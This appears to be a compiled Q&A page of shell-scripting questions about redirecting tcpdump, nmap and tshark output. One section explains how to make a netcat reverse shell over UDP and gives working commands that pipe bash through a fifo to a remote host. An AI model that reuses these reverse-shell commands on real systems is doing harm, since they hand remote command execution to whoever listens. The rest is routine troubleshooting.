In a bash script I need to run a tcpdump command and save the output to a file however when I do that via > /tmp/test.txt i still get the following output in the console:
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 1500 bytes
1 packet captured
1 packet received by filter
0 packets dropped by kernel
However I do wnat the script to wait for the command to complete before continuing.
is it possible to supress this output?
The output you're seeing is written to stderr, not stdout, so you can redirect it to /dev/null if you don't want to see it. For example:
tcpdump -nn -v -i eth0 -s 1500 -c 1 'ether proto 0x88cc' > /tmp/test.txt 2> /dev/null
Related
I have written the following shell script:
#! /bin/bash
# This script is designed to find hosts with MySQL installed
nmap -sT my_IP_address -p 3306 >/dev/null -oG MySQLscan
cat MySQLscan | grep open > MySQLscan2
cat MySQLscan2
According to the script the output of nmap should be sent to /dev/null. On the other hand, the final out put should be written to the file MySQLscan2 in my pwd.
Not as I have expected, two files are written to my pwd:
MySQLscan: Contains the output of the scan that I have expected to be in MySQLscan2.
MySQLscan2: This file is empty.
Is there an mistake in my script? How can I solve the problem?
Earlier today, I managed to run the script with correct output. I am not sure if I have changed the script in some way. I checked it again and again, but cannot find, what is wrong...
I am working with Kali Linux and Oracle VM Virtual Box.
> /dev/null causes shell to redirect stdout, that is a file with
file descriptor to 1
to /dev/null before the command starts so in other words to discard
it. When nmap runs with -oG MySQLscan option it opens a new file and
gets a new file descriptor. You can check it with strace:
$ strace -f nmap -sT localhost -p 3306 -oG MySQLscan |& grep MySQLscan
execve("/usr/bin/nmap", ["nmap", "-sT", "localhost", "-p", "22", "-oG", "MySQLscan"], 0x7ffc88805198 /* 60 vars */) = 0
openat(AT_FDCWD, "MySQLscan", O_WRONLY|O_CREAT|O_TRUNC, 0666) = 4
In this example openat() returned 4 as a new file descriptor (you
can read more about this function with man 2 openat). Since file
descriptor 4 hasn't been redirected before command started MySQLscan
gets created. Also notice that even if file descriptor that openat()
returns to open MySQLscan is redirected to /dev/null:
nmap -sT localhost -p 22 -oG MySQLscan 4>/dev/null
it doesn't prevent MySQLscan from being created because openat()
requests a new unused file descriptor from kernel every time it's
run.
I want to get a reverse shell over UDP using netcat. Netcat by default sends traffic over TCP, so in order to send it over UDP I run the -u option like this:
Host 1:
nc.traditional -l -p 4444 -v -u
Host 2:
nc.traditional localhost 4444 -e /bin/bash -u
But when I type a bash command I do not get the output. Why is that?
There are several problems with this:
You use localhost on Host 2. This is a special hostname that refers to the current host, not to Host 1.
UDP has no connections. Host 1 won't know where to send packets if it doesn't receive a message first.
bash reads input character by character, which doesn't work well with non-stream packet based data.
You can instead connect nc and bash with streams, and then send an immediate packet so that Host 1 will know where to send the commands you enter:
Host1:
nc.traditional -l -p 4444 -v -u
Host 2:
mkfifo fifo
nc.traditional -u host1 4444 < fifo |
{
echo "Hi"
bash
} > fifo
When trying to capture tcpdump output to a file, I get the following:
▒ò▒▒▒▒3▒X▒▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒Xu<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒D<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒D<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X5▒<<▒▒▒▒▒▒▒4▒4▒b
7
7▒▒3▒X▒<<▒▒▒▒▒▒▒4▒4▒b
If I run tcpdump without the -w the output displays fine in the shell.
Here is the input:
tcpdump -i eth0 -Z root -w `date '+%m-%d-%y.%T.pcap'`
tcpdump -w writes the raw file, which is not meant for reading directly. You can read the file back with the tcpdump -r option as suggested in the man page:
-r Read packets from file (which was created with the -w option). Standard input is used if file is ‘‘-’’.
-w Write the raw packets to file rather than parsing and printing them out. They can later be printed with the -r option. Standard output is used if file is ‘‘-’’. See pcap-savefile(5) for a description of the file format.
Another option would be to redirect the output without using the -w option:
tcpdump -i eth0 -Z root > `date '+%m-%d-%y.%T.pcap'`
But if I remember correctly you don’t get exactly what would be written with the -w option.
I am trying to save the output of a grep filter to a file.
I want to run tcpdump for a long time, and filter a certain IP to a file.
tcpdump -i eth0 -n -s 0 port 5060 -vvv | grep "A.B.C."
This works fine. It shows me IP's from my network.
But when I add >> file.dump at the end, the file is always empty.
My script:
tcpdump -i eth0 -n -s 0 port 5060 -vvv | grep "A.B.C." >> file.dump
And yes, it must be grep. I don't want to use tcpdump filters because it gives me millions of lines and with grep I get only one line per IP.
How can I redirect (append) the full output of the grep command to a file?
The output of tcpdump is probably going through stderr, not stdout. This means that grep won't catch it unless you convert it into stdout.
To do this you can use |&:
tcpdump -i eth0 -n -s 0 port 5060 -vvv |& grep "A.B.C."
Then, it may happen that the output is a continuous stream, so that you somehow have to tell grep to use line buffering. For this you have the option --line-buffered option.
All together, say:
tcpdump ... |& grep --line-buffered "A.B.C" >> file.dump
I have basically two lines of code which are:
tcpdump -i eth0 -s 65535 -w - >/tmp/Captures
tshark -i /tmp/Captures -T pdml >results.xml
if I run them both in separate terminals it works fine.
However I've been trying to create a simple bash script that will execute them at the same time, but have had no luck. Bash script is as follows:
#! /bin/bash
tcpdump -i eth0 -s 65535 -w - >/tmp/Captures &
tshark -i /tmp/Captures -T pdml >results.xml &
If anyone could possibly help in getting this to work or getting it to "run tcpdump until a key is pressed, then run tshark. then when a key is pressed again close."
I have only a little bash scripting experience.
Do you need to run tcpdump and tshark separately? Using a pipe command will feed the output of tcpdump to the input of tshark.
tcpdump -i eth0 -s 65535 | tshark -T -pdml > results.xml